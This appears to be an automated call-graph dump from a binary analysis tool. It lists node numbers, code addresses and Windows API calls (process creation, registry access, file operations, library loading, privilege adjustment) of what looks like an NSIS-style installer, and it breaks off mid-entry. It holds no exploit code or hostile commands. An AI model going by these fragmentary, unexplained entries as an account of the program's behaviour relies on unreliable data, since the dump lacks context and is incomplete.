5085->5098 5089 4022f1 5086->5089 5087->5085 5099 4062ba lstrcpynW 5088->5099 5094 405920 MessageBoxIndirectW 5089->5094 5092 401bdf GlobalFree 5092->5098 5093 401baa 5100 4062ba lstrcpynW 5093->5100 5094->5098 5096 401bb9 5102 4062ba lstrcpynW 5096->5102 5099->5093 5100->5096 5101->5092 5102->5098 5103 404a78 5104 404aa4 5103->5104 5105 404a88 5103->5105 5107 404ad7 5104->5107 5108 404aaa SHGetPathFromIDListW 5104->5108 5114 405904 GetDlgItemTextW 5105->5114 5110 404ac1 SendMessageW 5108->5110 5111 404aba 5108->5111 5109 404a95 SendMessageW 5109->5104 5110->5107 5113 40140b 2 API calls 5111->5113 5113->5110 5114->5109 5115 4024f8 5116 402c81 17 API calls 5115->5116 5117 402502 5116->5117 5118 402c1f 17 API calls 5117->5118 5119 40250b 5118->5119 5120 402533 RegEnumValueW 5119->5120 5121 402527 RegEnumKeyW 5119->5121 5122 40288b 5119->5122 5123 402548 RegCloseKey 5120->5123 5121->5123 5123->5122 5125 40167b 5126 402c41 17 API calls 5125->5126 5127 401682 5126->5127 5128 402c41 17 API calls 5127->5128 5129 40168b 5128->5129 5130 402c41 17 API calls 5129->5130 5131 401694 MoveFileW 5130->5131 5132 4016a0 5131->5132 5133 4016a7 5131->5133 5134 401423 24 API calls 5132->5134 5135 4065fd 2 API calls 5133->5135 5137 402250 5133->5137 5134->5137 5136 4016b6 5135->5136 5136->5137 5138 406080 36 API calls 5136->5138 5138->5132 5139 401e7d 5140 402c41 17 API calls 5139->5140 5141 401e83 5140->5141 5142 402c41 17 API calls 5141->5142 5143 401e8c 5142->5143 5144 402c41 17 API calls 5143->5144 5145 401e95 5144->5145 5146 402c41 17 API calls 5145->5146 5147 401e9e 5146->5147 5148 401423 24 API calls 5147->5148 5149 401ea5 5148->5149 5156 4058e6 ShellExecuteExW 5149->5156 5151 401ee7 5153 40288b 5151->5153 5157 406745 WaitForSingleObject 5151->5157 5154 401f01 CloseHandle 5154->5153 5156->5151 5159 40675f 5157->5159 5158 406771 GetExitCodeProcess 5158->5154 5159->5158 5160 4066d0 2 API calls 5159->5160 5161 406766 WaitForSingleObject 5160->5161 5161->5159 5162 4019ff 5163 402c41 17 API calls 5162->5163 5164 401a06 5163->5164 5165 402c41 17 API calls 5164->5165 5166 401a0f 5165->5166 5167 401a16 lstrcmpiW 5166->5167 5168 401a28 lstrcmpW 5166->5168 5169 401a1c 5167->5169 5168->5169 5170 401000 5171 401037 BeginPaint GetClientRect 5170->5171 5172 40100c DefWindowProcW 5170->5172 5174 4010f3 5171->5174 5177 401179 5172->5177 5175 401073 CreateBrushIndirect FillRect DeleteObject 5174->5175 5176 4010fc 5174->5176 5175->5174 5178 401102 CreateFontIndirectW 5176->5178 5179 401167 EndPaint 5176->5179 5178->5179 5180 401112 6 API calls 5178->5180 5179->5177 5180->5179 5181 401503 5182 40150b 5181->5182 5184 40151e 5181->5184 5183 402c1f 17 API calls 5182->5183 5183->5184 5185 402484 5186 402c81 17 API calls 5185->5186 5187 40248e 5186->5187 5188 402c41 17 API calls 5187->5188 5189 402497 5188->5189 5190 4024a2 RegQueryValueExW 5189->5190 5193 40288b 5189->5193 5191 4024c8 RegCloseKey 5190->5191 5192 4024c2 5190->5192 5191->5193 5192->5191 5196 406201 wsprintfW 5192->5196 5196->5191 5197 402104 5198 402c41 17 API calls 5197->5198 5199 40210b 5198->5199 5200 402c41 17 API calls 5199->5200 5201 402115 5200->5201 5202 402c41 17 API calls 5201->5202 5203 40211f 5202->5203 5204 402c41 17 API calls 5203->5204 5205 402129 5204->5205 5206 402c41 17 API calls 5205->5206 5208 402133 5206->5208 5207 402172 CoCreateInstance 5212 402191 5207->5212 5208->5207 5209 402c41 17 API calls 5208->5209 5209->5207 5210 401423 24 API calls 5211 402250 5210->5211 5212->5210 5212->5211 5213 73a410e1 5222 73a41111 5213->5222 5214 73a411d8 GlobalFree 5215 73a412ba 2 API calls 5215->5222 5216 73a411d3 5216->5214 5217 73a41272 2 API calls 5220 73a411c4 GlobalFree 5217->5220 5218 73a41164 GlobalAlloc 5218->5222 5219 73a411f8 GlobalFree 5219->5222 5220->5222 5221 73a412e1 lstrcpyW 5221->5222 5222->5214 5222->5215 5222->5216 5222->5217 5222->5218 5222->5219 5222->5220 5222->5221 5223 401f06 5224 402c41 17 API calls 5223->5224 5225 401f0c 5224->5225 5226 405322 24 API calls 5225->5226 5227 401f16 5226->5227 5228 4058a3 2 API calls 5227->5228 5229 401f1c 5228->5229 5230 401f3f CloseHandle 5229->5230 5232 406745 5 API calls 5229->5232 5233 40288b 5229->5233 5230->5233 5234 401f31 5232->5234 5234->5230 5236 406201 wsprintfW 5234->5236 5236->5230 4092 401389 4094 401390 4092->4094 4093 4013fe 4094->4093 4095 4013cb MulDiv SendMessageW 4094->4095 4095->4094 5237 73a4166d 5238 73a41516 GlobalFree 5237->5238 5241 73a41685 5238->5241 5239 73a416cb GlobalFree 5240 73a416a0 5240->5239 5241->5239 5241->5240 5242 73a416b7 VirtualFree 5241->5242 5242->5239 4123 40230c 4124 402314 4123->4124 4125 40231a 4123->4125 4126 402c41 17 API calls 4124->4126 4127 402328 4125->4127 4129 402c41 17 API calls 4125->4129 4126->4125 4128 402336 4127->4128 4130 402c41 17 API calls 4127->4130 4131 402c41 17 API calls 4128->4131 4129->4127 4130->4128 4132 40233f WritePrivateProfileStringW 4131->4132 5243 40190c 5244 401943 5243->5244 5245 402c41 17 API calls 5244->5245 5246 401948 5245->5246 5247 4059cc 67 API calls 5246->5247 5248 401951 5247->5248 5249 401f8c 5250 402c41 17 API calls 5249->5250 5251 401f93 5250->5251 5252 406694 5 API calls 5251->5252 5253 401fa2 5252->5253 5254 401fbe GlobalAlloc 5253->5254 5263 402026 5253->5263 5255 401fd2 5254->5255 5254->5263 5256 406694 5 API calls 5255->5256 5257 401fd9 5256->5257 5258 406694 5 API calls 5257->5258 5259 401fe3 5258->5259 5259->5263 5264 406201 wsprintfW 5259->5264 5261 402018 5265 406201 wsprintfW 5261->5265 5264->5261 5265->5263 4140 40238e 4141 4023c1 4140->4141 4142 402396 4140->4142 4143 402c41 17 API calls 4141->4143 4156 402c81 4142->4156 4145 4023c8 4143->4145 4152 402cff 4145->4152 4148 4023a7 4149 402c41 17 API calls 4148->4149 4150 4023ae RegDeleteValueW RegCloseKey 4149->4150 4151 4023d5 4150->4151 4153 402d13 4152->4153 4154 402d0c 4152->4154 4153->4154 4161 402d44 4153->4161 4154->4151 4157 402c41 17 API calls 4156->4157 4158 402c98 4157->4158 4159 406127 RegOpenKeyExW 4158->4159 4160 40239d 4159->4160 4160->4148 4160->4151 4162 406127 RegOpenKeyExW 4161->4162 4163 402d72 4162->4163 4164 402dec 4163->4164 4166 402d76 4163->4166 4164->4154 4165 402d98 RegEnumKeyW 4165->4166 4167 402daf RegCloseKey 4165->4167 4166->4165 4166->4167 4168 402dd0 RegCloseKey 4166->4168 4170 402d44 6 API calls 4166->4170 4169 406694 5 API calls 4167->4169 4168->4164 4171 402dbf 4169->4171 4170->4166 4172 402de0 RegDeleteKeyW 4171->4172 4173 402dc3 4171->4173 4172->4164 4173->4164 4253 40338f SetErrorMode GetVersion 4254 4033ce 4253->4254 4255 4033d4 4253->4255 4256 406694 5 API calls 4254->4256 4257 406624 3 API calls 4255->4257 4256->4255 4258 4033ea lstrlenA 4257->4258 4258->4255 4259 4033fa 4258->4259 4260 406694 5 API calls 4259->4260 4261 403401 4260->4261 4262 406694 5 API calls 4261->4262 4263 403408 4262->4263 4264 406694 5 API calls 4263->4264 4265 403414 #17 OleInitialize SHGetFileInfoW 4264->4265 4343 4062ba lstrcpynW 4265->4343 4268 403460 GetCommandLineW 4344 4062ba lstrcpynW 4268->4344 4270 403472 4271 405bbc CharNextW 4270->4271 4272 403497 CharNextW 4271->4272 4273 4035c1 GetTempPathW 4272->4273 4283 4034b0 4272->4283 4345 40335e 4273->4345 4275 4035d9 4276 403633 DeleteFileW 4275->4276 4277 4035dd GetWindowsDirectoryW lstrcatW 4275->4277 4355 402edd GetTickCount GetModuleFileNameW 4276->4355 4278 40335e 12 API calls 4277->4278 4281 4035f9 4278->4281 4279 405bbc CharNextW 4279->4283 4281->4276 4284 4035fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4281->4284 4282 403647 4285 4036fa 4282->4285 4290 4036ea 4282->4290 4294 405bbc CharNextW 4282->4294 4283->4279 4288 4035ac 4283->4288 4289 4035aa 4283->4289 4287 40335e 12 API calls 4284->4287 4443 4038d0 4285->4443 4292 40362b 4287->4292 4440 4062ba lstrcpynW 4288->4440 4289->4273 4383 4039aa 4290->4383 4292->4276 4292->4285 4307 403666 4294->4307 4296 403834 4299 4038b8 ExitProcess 4296->4299 4300 40383c GetCurrentProcess OpenProcessToken 4296->4300 4297 403714 4298 405920 MessageBoxIndirectW 4297->4298 4302 403722 ExitProcess 4298->4302 4305 403854 LookupPrivilegeValueW AdjustTokenPrivileges 4300->4305 4306 403888 4300->4306 4303 4036c4 4308 405c97 18 API calls 4303->4308 4304 40372a 4309 40588b 5 API calls 4304->4309 4305->4306 4310 406694 5 API calls 4306->4310 4307->4303 4307->4304 4311 4036d0 4308->4311 4312 40372f lstrcatW 4309->4312 4313 40388f 4310->4313 4311->4285 4441 4062ba lstrcpynW 4311->4441 4314 403740 lstrcatW 4312->4314 4315 40374b lstrcatW lstrcmpiW 4312->4315 4316 4038a4 ExitWindowsEx 4313->4316 4317 4038b1 4313->4317 4314->4315 4315->4285 4319 403767 4315->4319 4316->4299 4316->4317 4455 40140b 4317->4455 4322 403773 4319->4322 4323 40376c 4319->4323 4321 4036df 4442 4062ba lstrcpynW 4321->4442 4326 40586e 2 API calls 4322->4326 4325 4057f1 4 API calls 4323->4325 4328 403771 4325->4328 4327 403778 SetCurrentDirectoryW 4326->4327 4329 403793 4327->4329 4330 403788 4327->4330 4328->4327 4451 4062ba lstrcpynW 4329->4451 4450 4062ba lstrcpynW 4330->4450 4333 4062dc 17 API calls 4334 4037d2 DeleteFileW 4333->4334 4335 4037df CopyFileW 4334->4335 4340 4037a1 4334->4340 4335->4340 4336 403828 4337 406080 36 API calls 4336->4337 4337->4285 4338 406080 36 API calls 4338->4340 4339 4062dc 17 API calls 4339->4340 4340->4333 4340->4336 4340->4338 4340->4339 4342 403813 CloseHandle 4340->4342 4452 4058a3 CreateProcessW 4340->4452 4342->4340 4343->4268 4344->4270 4346 40654e 5 API calls 4345->4346 4347 40336a 4346->4347 4348 403374 4347->4348 4349 405b8f 3 API calls 4347->4349 4348->4275 4350 40337c 4349->4350 4351 40586e 2 API calls 4350->4351 4352 403382 4351->4352 4458 405ddf 4352->4458 4462 405db0 GetFileAttributesW CreateFileW 4355->4462 4357 402f1d 4377 402f2d 4357->4377 4463 4062ba lstrcpynW 4357->4463 4359 402f43 4360 405bdb 2 API calls 4359->4360 4361 402f49 4360->4361 4464 4062ba lstrcpynW 4361->4464 4363 402f54 GetFileSize 4364 403050 4363->4364 4375 402f6b 4363->4375 4465 402e79 4364->4465 4366 403059 4368 403089 GlobalAlloc 4366->4368 4366->4377 4477 403347 SetFilePointer 4366->4477 4367 403331 ReadFile 4367->4375 4476 403347 SetFilePointer 4368->4476 4369 4030bc 4373 402e79 6 API calls 4369->4373 4372 4030a4 4376 403116 31 API calls 4372->4376 4373->4377 4374 403072 4378 403331 ReadFile 4374->4378 4375->4364 4375->4367 4375->4369 4375->4377 4379 402e79 6 API calls 4375->4379 4381 4030b0 4376->4381 4377->4282 4380 40307d 4378->4380 4379->4375 4380->4368 4380->4377 4381->4377 4381->4381 4382 4030ed SetFilePointer 4381->4382 4382->4377 4384 406694 5 API calls 4383->4384 4385 4039be 4384->4385 4386 4039c4 4385->4386 4387 4039d6 4385->4387 4490 406201 wsprintfW 4386->4490 4388 406188 3 API calls 4387->4388 4389 403a06 4388->4389 4390 403a25 lstrcatW 4389->4390 4392 406188 3 API calls 4389->4392 4393 4039d4 4390->4393 4392->4390 4482 403c80 4393->4482 4396 405c97 18 API calls 4397 403a57 4396->4397 4398 403aeb 4397->4398 4400 406188 3 API calls 4397->4400 4399 405c97 18 API calls 4398->4399 4401 403af1 4399->4401 4402 403a89 4400->4402 4403 403b01 LoadImageW 4401->4403 4406 4062dc 17 API calls 4401->4406 4402->4398 4409 403aaa lstrlenW 4402->4409 4413 405bbc CharNextW 4402->4413 4404 403ba7 4403->4404 4405 403b28 RegisterClassW 4403->4405 4408 40140b 2 API calls 4404->4408 4407 403b5e SystemParametersInfoW CreateWindowExW 4405->4407 4439 403bb1 4405->4439 4406->4403 4407->4404 4412 403bad 4408->4412 4410 403ab8 lstrcmpiW 4409->4410 4411 403ade 4409->4411 4410->4411 4415 403ac8 GetFileAttributesW 4410->4415 4416 405b8f 3 API calls 4411->4416 4418 403c80 18 API calls 4412->4418 4412->4439 4414 403aa7 4413->4414 4414->4409 4417 403ad4 4415->4417 4419 403ae4 4416->4419 4417->4411 4420 405bdb 2 API calls 4417->4420 4421 403bbe 4418->4421 4491 4062ba lstrcpynW 4419->4491 4420->4411 4423 403bca ShowWindow 4421->4423 4424 403c4d 4421->4424 4426 406624 3 API calls 4423->4426 4492 4053f5 OleInitialize 4424->4492 4428 403be2 4426->4428 4427 403c53 4429 403c57 4427->4429 4430 403c6f 4427->4430 4431 403bf0 GetClassInfoW 4428->4431 4435 406624 3 API calls 4428->4435 4437 40140b 2 API calls 4429->4437 4429->4439 4434 40140b 2 API calls 4430->4434 4432 403c04 GetClassInfoW RegisterClassW 4431->4432 4433 403c1a DialogBoxParamW 4431->4433 4432->4433 4436 40140b 2 API calls 4433->4436 4434->4439 4435->4431 4438 403c42 4436->4438 4437->4439 4438->4439 4439->4285 4440->4289 4441->4321 4442->4290 4444 4038e8 4443->4444 4445 4038da CloseHandle 4443->4445 4510 403915 4444->4510 4445->4444 4448 4059cc 67 API calls 4449 403703 OleUninitialize 4448->4449 4449->4296 4449->4297 4450->4329 4451->4340 4453 4058e2 4452->4453 4454 4058d6 CloseHandle 4452->4454 4453->4340 4454->4453 4456 401389 2 API calls 4455->4456 4457 401420 4456->4457 4457->4299 4459 405dec GetTickCount GetTempFileNameW 4458->4459 4460 405e22 4459->4460 4461 40338d 4459->4461 4460->4459 4460->4461 4461->4275 4462->4357 4463->4359 4464->4363 4466 402e82 4465->4466 4467 402e9a 4465->4467 4468 402e92 4466->4468 4469 402e8b DestroyWindow 4466->4469 4470 402ea2 4467->4470 4471 402eaa GetTickCount 4467->4471 4468->4366 4469->4468 4478 4066d0 4470->4478 4473 402eb8 CreateDialogParamW ShowWindow 4471->4473 4474 402edb 4471->4474 4473->4474 4474->4366 4476->4372 4477->4374 4479 4066ed PeekMessageW 4478->4479 4480 4066e3 DispatchMessageW 4479->4480 4481 402ea8 4479->4481 4480->4479 4481->4366 4483 403c94 4482->4483 4499 406201 wsprintfW 4483->4499 4485 403d05 4500 403d39 4485->4500 4487 403a35 4487->4396 4488 403d0a 4488->4487 4489 4062dc 17 API calls 4488->4489 4489->4488 4490->4393 4491->4398 4503 40427d 4492->4503 4494 40427d SendMessageW 4496 405451 OleUninitialize 4494->4496 4495 405418 4498 40543f 4495->4498 4506 401389 4495->4506 4496->4427 4498->4494 4499->4485 4501 4062dc 17 API calls 4500->4501 4502 403d47 SetWindowTextW 4501->4502 4502->4488 4504 404295 4503->4504 4505 404286 SendMessageW 4503->4505 4504->4495 4505->4504 4508 401390 4506->4508 4507 4013fe 4507->4495 4508->4507 4509 4013cb MulDiv SendMessageW 4508->4509 4509->4508 4511 403923 4510->4511 4512 4038ed 4511->4512 4513 403928 FreeLibrary GlobalFree 4511->4513 4512->4448 4513->4512 4513->4513 5266 40190f 5267 402c41 17 API calls 5266->5267 5268 401916 5267->5268 5269 405920 MessageBoxIndirectW 5268->5269 5270 40191f 5269->5270 5271 401491 5272 405322 24 API calls 5271->5272 5273 401498 5272->5273 5274 401d14 5275 402c1f 17 API calls 5274->5275 5276 401d1b 5275->5276 5277 402c1f 17 API calls 5276->5277 5278 401d27 GetDlgItem 5277->5278 5279 402592 5278->5279 5280 405296 5281 4052a6 5280->5281 5282 4052ba 5280->5282 5283 4052ac 5281->5283 5292 405303 5281->5292 5284 4052c2 IsWindowVisible 5282->5284 5290 4052d9 5282->5290 5286 40427d SendMessageW 5283->5286 5287 4052cf 5284->5287 5284->5292 5285 405308 CallWindowProcW 5288 4052b6 5285->5288 5286->5288 5293 404bec SendMessageW 5287->5293 5290->5285 5298 404c6c 5290->5298 5292->5285 5294 404c4b SendMessageW 5293->5294 5295 404c0f GetMessagePos ScreenToClient SendMessageW 5293->5295 5296 404c43 5294->5296 5295->5296 5297 404c48 5295->5297 5296->5290 5297->5294 5307 4062ba lstrcpynW 5298->5307 5300 404c7f 5308 406201 wsprintfW 5300->5308 5302 404c89 5303 40140b 2 API calls 5302->5303 5304 404c92 5303->5304 5309 4062ba lstrcpynW 5304->5309 5306 404c99 5306->5292 5307->5300 5308->5302 5309->5306 5310 402598 5311 4025c7 5310->5311 5312 4025ac 5310->5312 5314 4025fb 5311->5314 5315 4025cc 5311->5315 5313 402c1f 17 API calls 5312->5313 5322 4025b3 5313->5322 5317 402c41 17 API calls 5314->5317 5316 402c41 17 API calls 5315->5316 5318 4025d3 WideCharToMultiByte lstrlenA 5316->5318 5319 402602 lstrlenW 5317->5319 5318->5322 5319->5322 5320 402645 5321 405e62 WriteFile 5321->5320 5322->5320 5323 405e91 5 API calls 5322->5323 5324 40262f 5322->5324 5323->5324 5324->5320 5324->5321 5325 73a422fd 5326 73a42367 5325->5326 5327 73a42372 GlobalAlloc 5326->5327 5328 73a42391 5326->5328 5327->5326 5329 404c9e GetDlgItem GetDlgItem 5330 404cf0 7 API calls 5329->5330 5372 404f09 5329->5372 5331 404d93 DeleteObject 5330->5331 5332 404d86 SendMessageW 5330->5332 5333 404d9c 5331->5333 5332->5331 5335 404dd3 5333->5335 5336 4062dc 17 API calls 5333->5336 5334 404fed 5338 405099 5334->5338 5343 404efc 5334->5343 5344 405046 SendMessageW 5334->5344 5337 404231 18 API calls 5335->5337 5339 404db5 SendMessageW SendMessageW 5336->5339 5342 404de7 5337->5342 5340 4050a3 SendMessageW 5338->5340 5341 4050ab 5338->5341 5339->5333 5340->5341 5352 4050c4 5341->5352 5353 4050bd ImageList_Destroy 5341->5353 5357 4050d4 5341->5357 5348 404231 18 API calls 5342->5348 5345 404298 8 API calls 5343->5345 5344->5343 5350 40505b SendMessageW 5344->5350 5351 40528f 5345->5351 5346 404fdf SendMessageW 5346->5334 5347 404bec 5 API calls 5363 404f7a 5347->5363 5360 404df5 5348->5360 5349 405243 5349->5343 5358 405255 ShowWindow GetDlgItem ShowWindow 5349->5358 5354 40506e 5350->5354 5355 4050cd GlobalFree 5352->5355 5352->5357 5353->5352 5365 40507f SendMessageW 5354->5365 5355->5357 5356 404eca GetWindowLongW SetWindowLongW 5359 404ee3 5356->5359 5357->5349 5371 404c6c 4 API calls 5357->5371 5376 40510f 5357->5376 5358->5343 5361 404f01 5359->5361 5362 404ee9 ShowWindow 5359->5362 5360->5356 5364 404e45 SendMessageW 5360->5364 5366 404ec4 5360->5366 5369 404e81 SendMessageW 5360->5369 5370 404e92 SendMessageW 5360->5370 5381 404266 SendMessageW 5361->5381 5380 404266 SendMessageW 5362->5380 5363->5334 5363->5346 5364->5360 5365->5338 5366->5356 5366->5359 5369->5360 5370->5360 5371->5376 5372->5334 5372->5347 5372->5363 5373 405219 InvalidateRect 5373->5349 5374 40522f 5373->5374 5382 404ba7 5374->5382 5375 40513d SendMessageW 5379 405153 5375->5379 5376->5375 5376->5379 5378 4051c7 SendMessageW SendMessageW 5378->5379 5379->5373 5379->5378 5380->5343 5381->5372 5385 404ade 5382->5385 5384 404bbc 5384->5349 5386 404af7 5385->5386 5387 4062dc 17 API calls 5386->5387 5388 404b5b 5387->5388 5389 4062dc 17 API calls 5388->5389 5390 404b66 5389->5390 5391 4062dc 17 API calls 5390->5391 5392 404b7c lstrlenW wsprintfW SetDlgItemTextW 5391->5392 5392->5384 5393 40149e 5394 4022f7 5393->5394 5395 4014ac PostQuitMessage 5393->5395 5395->5394 5396 401c1f 5397 402c1f 17 API calls 5396->5397 5398 401c26 5397->5398 5399 402c1f 17 API calls 5398->5399 5400 401c33 5399->5400 5401 401c48 5400->5401 5402 402c41 17 API calls 5400->5402 5403 401c58 5401->5403 5404 402c41 17 API calls 5401->5404 5402->5401 5405 401c63 5403->5405 5406 401caf 5403->5406 5404->5403 5408 402c1f 17 API calls 5405->5408 5407 402c41 17 API calls 5406->5407 5409 401cb4 5407->5409 5410 401c68 5408->5410 5411 402c41 17 API calls 5409->5411 5412 402c1f 17 API calls 5410->5412 5413 401cbd FindWindowExW 5411->5413 5414 401c74 5412->5414 5417 401cdf 5413->5417 5415 401c81 SendMessageTimeoutW 5414->5415 5416 401c9f SendMessageW 5414->5416 5415->5417 5416->5417 5418 402aa0 SendMessageW 5419 402ac5 5418->5419 5420 402aba InvalidateRect 5418->5420 5420->5419 5421 402821 5422 402827 5421->5422 5423 402ac5 5422->5423 5424 40282f FindClose 5422->5424 5424->5423 5425 4043a1 lstrlenW 5426 4043c0 5425->5426 5427 4043c2 WideCharToMultiByte 5425->5427 5426->5427 5428 404722 5429 40474e 5428->5429 5430 40475f 5428->5430 5489 405904 GetDlgItemTextW 5429->5489 5432 40476b GetDlgItem 5430->5432 5435 4047ca 5430->5435 5434 40477f 5432->5434 5433 404759 5437 40654e 5 API calls 5433->5437 5438 404793 SetWindowTextW 5434->5438 5441 405c3a 4 API calls 5434->5441 5436 4048ae 5435->5436 5443 4062dc 17 API calls 5435->5443 5487 404a5d 5435->5487 5436->5487 5491 405904 GetDlgItemTextW 5436->5491 5437->5430 5442 404231 18 API calls 5438->5442 5440 404298 8 API calls 5448 404a71 5440->5448 5449 404789 5441->5449 5445 4047af 5442->5445 5446 40483e SHBrowseForFolderW 5443->5446 5444 4048de 5447 405c97 18 API calls 5444->5447 5450 404231 18 API calls 5445->5450 5446->5436 5451 404856 CoTaskMemFree 5446->5451 5452 4048e4 5447->5452 5449->5438 5455 405b8f 3 API calls 5449->5455 5453 4047bd 5450->5453 5454 405b8f 3 API calls 5451->5454 5492 4062ba lstrcpynW 5452->5492 5490 404266 SendMessageW 5453->5490 5462 404863 5454->5462 5455->5438 5458 4047c3 5461 406694 5 API calls 5458->5461 5459 40489a SetDlgItemTextW 5459->5436 5460 4048fb 5463 406694 5 API calls 5460->5463 5461->5435 5462->5459 5464 4062dc 17 API calls 5462->5464 5471 404902 5463->5471 5465 404882 lstrcmpiW 5464->5465 5465->5459 5468 404893 lstrcatW 5465->5468 5466 404943 5493 4062ba lstrcpynW 5466->5493 5468->5459 5469 40494a 5470 405c3a 4 API calls 5469->5470 5472 404950 GetDiskFreeSpaceW 5470->5472 5471->5466 5475 405bdb 2 API calls 5471->5475 5477 40499b 5471->5477 5474 404974 MulDiv 5472->5474 5472->5477 5474->5477 5475->5471 5476 404a0c 5479 404a2f 5476->5479 5481 40140b 2 API calls 5476->5481 5477->5476 5478 404ba7 20 API calls 5477->5478 5480 4049f9 5478->5480 5494 404253 EnableWindow 5479->5494 5483 404a0e SetDlgItemTextW 5480->5483 5484 4049fe 5480->5484 5481->5479 5483->5476 5486 404ade 20 API calls 5484->5486 5485 404a4b 5485->5487 5488 40467b SendMessageW 5485->5488 5486->5476 5487->5440 5488->5487 5489->5433 5490->5458 5491->5444 5492->5460 5493->5469 5494->5485 4088 4015a3 4089 402c41 17 API calls 4088->4089 4090 4015aa SetFileAttributesW 4089->4090 4091 4015bc 4090->4091 5495 4028ad 5496 402c41 17 API calls 5495->5496 5498 4028bb 5496->5498 5497 4028d1 5500 405d8b 2 API calls 5497->5500 5498->5497 5499 402c41 17 API calls 5498->5499 5499->5497 5501 4028d7 5500->5501 5523 405db0 GetFileAttributesW CreateFileW 5501->5523 5503 4028e4 5504 4028f0 GlobalAlloc 5503->5504 5505 402987 5503->5505 5506 402909 5504->5506 5507 40297e CloseHandle 5504->5507 5508 4029a2 5505->5508 5509 40298f DeleteFileW 5505->5509 5524 403347 SetFilePointer 5506->5524 5507->5505 5509->5508 5511 40290f 5512 403331 ReadFile 5511->5512 5513 402918 GlobalAlloc 5512->5513 5514 402928 5513->5514 5515 40295c 5513->5515 5517 403116 31 API calls 5514->5517 5516 405e62 WriteFile 5515->5516 5518 402968 GlobalFree 5516->5518 5522 402935 5517->5522 5519 403116 31 API calls 5518->5519 5521 40297b 5519->5521 5520 402953 GlobalFree 5520->5515 5521->5507 5522->5520 5523->5503 5524->5511 5525 401a30 5526 402c41 17 API calls 5525->5526 5527 401a39 ExpandEnvironmentStringsW 5526->5527 5528 401a4d 5527->5528 5530 401a60 5527->5530 5529 401a52 lstrcmpW 5528->5529 5528->5530 5529->5530 5531 73a416d4 5532 73a41703 5531->5532 5533 73a41b5f 22 API calls 5532->5533 5534 73a4170a 5533->5534 5535 73a41711 5534->5535 5536 73a4171d 5534->5536 5537 73a41272 2 API calls 5535->5537 5538 73a41744 5536->5538 5539 73a41727 5536->5539 5542 73a4171b 5537->5542 5540 73a4176e 5538->5540 5541 73a4174a 5538->5541 5543 73a4153d 3 API calls 5539->5543 5545 73a4153d 3 API calls 5540->5545 5544 73a415b4 3 API calls 5541->5544 5546 73a4172c 5543->5546 5547 73a4174f 5544->5547 5545->5542 5548 73a415b4 3 API calls 5546->5548 5549 73a41272 2 API calls 5547->5549 5550 73a41732 5548->5550 5551 73a41755 GlobalFree 5549->5551 5552 73a41272 2 API calls 5550->5552 5551->5542 5553 73a41769 GlobalFree 5551->5553 5554 73a41738 GlobalFree 5552->5554 5553->5542 5554->5542 4514 402032 4515 402044 4514->4515 4516 4020f6 4514->4516 4517 402c41 17 API calls 4515->4517 4518 401423 24 API calls 4516->4518 4519 40204b 4517->4519 4524 402250 4518->4524 4520 402c41 17 API calls 4519->4520 4521 402054 4520->4521 4522 40206a LoadLibraryExW 4521->4522 4523 40205c GetModuleHandleW 4521->4523 4522->4516 4525 40207b 4522->4525 4523->4522 4523->4525 4537 406703 WideCharToMultiByte 4525->4537 4528 4020c5 4530 405322 24 API calls 4528->4530 4529 40208c 4531 402094 4529->4531 4532 4020ab 4529->4532 4533 40209c 4530->4533 4534 401423 24 API calls 4531->4534 4540 73a41777 4532->4540 4533->4524 4535 4020e8 FreeLibrary 4533->4535 4534->4533 4535->4524 4538 40672d GetProcAddress 4537->4538 4539 402086 4537->4539 4538->4539 4539->4528 4539->4529 4541 73a417aa 4540->4541 4582 73a41b5f 4541->4582 4543 73a417b1 4544 73a418d6 4543->4544 4545 73a417c2 4543->4545 4546 73a417c9 4543->4546 4544->4533 4632 73a42352 4545->4632 4616 73a42394 4546->4616 4551 73a417ee 4552 73a4182d 4551->4552 4553 73a4180f 4551->4553 4555 73a41833 4552->4555 4556 73a4187e 4552->4556 4645 73a42569 4553->4645 4554 73a417f8 4554->4551 4642 73a42d37 4554->4642 4664 73a415c6 4555->4664 4563 73a42569 10 API calls 4556->4563 4558 73a417df 4559 73a417e5 4558->4559 4565 73a417f0 4558->4565 4559->4551 4626 73a42aac 4559->4626 4568 73a4186f 4563->4568 4564 73a41815 4656 73a415b4 4564->4656 4636 73a42724 4565->4636 4574 73a418c5 4568->4574 4670 73a4252c 4568->4670 4571 73a417f6 4571->4551 4572 73a42569 10 API calls 4572->4568 4574->4544 4576 73a418cf GlobalFree 4574->4576 4576->4544 4579 73a418b1 4579->4574 4674 73a4153d wsprintfW 4579->4674 4580 73a418aa FreeLibrary 4580->4579 4677 73a4121b GlobalAlloc 4582->4677 4584 73a41b83 4678 73a4121b GlobalAlloc 4584->4678 4586 73a41da9 GlobalFree GlobalFree GlobalFree 4587 73a41dc6 4586->4587 4606 73a41e10 4586->4606 4588 73a42192 4587->4588 4596 73a41ddb 4587->4596 4587->4606 4590 73a421b4 GetModuleHandleW 4588->4590 4588->4606 4589 73a41c64 GlobalAlloc 4605 73a41b8e 4589->4605 4592 73a421c5 LoadLibraryW 4590->4592 4593 73a421da 4590->4593 4591 73a41ccd GlobalFree 4591->4605 4592->4593 4592->4606 4685 73a4161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4593->4685 4594 73a41caf lstrcpyW 4595 73a41cb9 lstrcpyW 4594->4595 4595->4605 4596->4606 4681 73a4122c 4596->4681 4598 73a4222c 4600 73a42239 lstrlenW 4598->4600 4598->4606 4686 73a4161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4600->4686 4601 73a42064 4684 73a4121b GlobalAlloc 4601->4684 4602 73a420ec 4602->4606 4609 73a42134 lstrcpyW 4602->4609 4605->4586 4605->4589 4605->4591 4605->4594 4605->4595 4605->4601 4605->4602 4605->4606 4608 73a41fa5 GlobalFree 4605->4608 4611 73a41d0b 4605->4611 4612 73a4122c 2 API calls 4605->4612 4606->4543 4607 73a421ec 4607->4598 4614 73a42216 GetProcAddress 4607->4614 4608->4605 4609->4606 4610 73a42253 4610->4606 4611->4605 4679 73a4158f GlobalSize GlobalAlloc 4611->4679 4612->4605 4614->4598 4615 73a4206d 4615->4543 4618 73a423ac 4616->4618 4617 73a4122c GlobalAlloc lstrcpynW 4617->4618 4618->4617 4620 73a424d5 GlobalFree 4618->4620 4621 73a42454 GlobalAlloc WideCharToMultiByte 4618->4621 4622 73a4247f GlobalAlloc CLSIDFromString 4618->4622 4625 73a4249e 4618->4625 4688 73a412ba 4618->4688 4620->4618 4623 73a417cf 4620->4623 4621->4620 4622->4620 4623->4551 4623->4554 4623->4558 4625->4620 4692 